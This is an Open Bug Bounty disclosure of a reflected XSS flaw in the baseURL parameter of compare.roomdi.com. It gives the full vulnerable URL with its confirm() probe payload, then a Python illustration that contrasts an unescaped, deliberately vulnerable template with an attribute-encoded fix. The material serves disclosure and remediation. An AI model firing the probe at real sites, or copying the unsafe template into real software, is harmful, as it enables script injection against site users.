compare.roomdi.com XSS vulnerability

2017-12-01T10:32:00
ID OBB:446113
Type openbugbounty
Reporter Random_Robbie
Modified 2018-03-01T10:32:00

Description

Open Bug Bounty ID: OBB-446113

Description| Value
---|---
Affected Website:| compare.roomdi.com
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL (the reflected parameter is baseURL; the probe "'--!>confirm(/OPENBUGBOUNTY/) is appended to its value):
http://compare.roomdi.com/rates/search/index.php?hotelID=17818&checkInDate=12/11/2017&checkOutDate=12/12/2017&rooms=1&guests=2&publisherID=2608&referralURL=http%3A%2F%2Fwww.roomdi.com%2Fhotel%2F%3Flang%3Den%26check_in%3D11%252F12%252F2017%26option%3D16%26hotel%3D205026%26utm_source%3Dtripadvisor%26client%3Dtripadvisor%26utm_medium%3Dsearch%26rooms%3D30%252C30%26nswid%3DapdQT4jaFOiw7PxnGcFPcB2XvbVDmkPkw6FL%252FmpzQ2kP91NFCgx8eWnrhuHBJ7bvBxBBPtbdZJP4tb60LyZM7FC4c9KEyV08b8z%252Bo0l%252F%252FsHoam9KHVwsq82%252BJvexJTzLTwNf9JYLNxvG7O3keoKt%252BCc7ZjuWpabkAg%252BLIRrL5S%252Bkya6vNsxVqjiDVYqPgq3pdLSxeLb2hfvdKsnPPbDte3GHtje40TI9%252BILfat2v4DRcodQLCXFOpwxgI1itde9XMv44H5ho0sJvnllWE82JX%252FIX%252FaUVMIjU94vd2Tglk5me2oQyr6jCD5JTglAiq51TE1YjcVMAJ4nhKuOkxFgPB2hQJ5jgAFbmbCsSqZcunON4xUVmNBZyteQCYwAVCW1E%26sid%3D929fad6c-eb39-409d-aec0-a0c14ed2a324%26check_out%3D12%252F12%252F2017%26market%3Duk%23stay&type=2&baseURL=http%3A%2F%2Fcompare.roomdi.com"'--!>confirm(/OPENBUGBOUNTY/)
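The report does not say where baseURL is reflected, only that the probe comes back unencoded. The following is an added illustration, not code from Open Bug Bounty or from the roomdi.com site: it assumes a hypothetical attribute-value reflection (render_unsafe) and shows the fix the remediation guide calls for, HTML attribute encoding with the value kept quoted (render_safe). Both pages are fed through Python's HTML tokenizer so you can see what a browser ends up storing in the attribute, and probe_reflected_raw is the one-line triage check you would run against a captured response. The input string is constructed from the probe in the URL above.

```python
import html
from html.parser import HTMLParser
from typing import Optional

# Probe string from the report's Vulnerable URL (the tail of the baseURL
# parameter). It is built to close a double- or single-quoted attribute
# and an HTML comment, so it exposes an unencoded reflection in any of
# those contexts.
OBB_PROBE = '"\'--!>confirm(/OPENBUGBOUNTY/)'

# Constructed input: the legitimate baseURL value with the probe appended,
# i.e. the baseURL parameter from the report after percent-decoding.
TAINTED = "http://compare.roomdi.com" + OBB_PROBE


def render_unsafe(base_url: str) -> str:
    """Assumed stand-in for the site's custom code (not the real page): the
    query parameter is interpolated into an attribute value with no encoding."""
    return f'<input type="hidden" name="baseURL" value="{base_url}">'


def render_safe(base_url: str) -> str:
    """Same template, fixed per the OWASP XSS Prevention Cheat Sheet: encode
    the untrusted value for the HTML attribute context and keep the attribute
    quoted. html.escape(quote=True) turns & < > " ' into entities, so the
    probe can no longer close the quote or the tag."""
    return f'<input type="hidden" name="baseURL" value="{html.escape(base_url, quote=True)}">'


class _Collector(HTMLParser):
    """Records start tags with their attributes and any text outside tags,
    roughly what a browser's tokenizer hands to the DOM builder."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []
        self.text = ""

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

    def handle_data(self, data):
        self.text += data


def parse(markup: str) -> _Collector:
    p = _Collector()
    p.feed(markup)
    p.close()
    return p


def reflected_value(markup: str) -> Optional[str]:
    """The value the baseURL input actually ends up with after tokenizing."""
    for tag, attrs in parse(markup).tags:
        if tag == "input" and attrs.get("name") == "baseURL":
            return attrs.get("value")
    return None


def probe_reflected_raw(body: str, probe: str = OBB_PROBE) -> bool:
    """Triage check for a captured response: True when the probe's quote and
    tag characters come back byte-for-byte, i.e. no output encoding at all."""
    return probe in body


if __name__ == "__main__":
    for label, page in (("unsafe", render_unsafe(TAINTED)), ("safe", render_safe(TAINTED))):
        doc = parse(page)
        print(f"{label}: raw reflection={probe_reflected_raw(page)} "
              f"value={reflected_value(page)!r} stray text={doc.text!r}")
```

In the unsafe rendering the attribute is cut off at the first `"` of the probe and the rest of the payload spills out of the tag as stray text, which is the breakout an attacker builds on. In the hardened rendering the tokenizer returns the full tainted string as the attribute's value and nothing leaks outside the tag. Note that attribute encoding is only correct for an attribute context; if the real reflection is inside a script block or a URL, the cheat sheet prescribes a different encoder for that context.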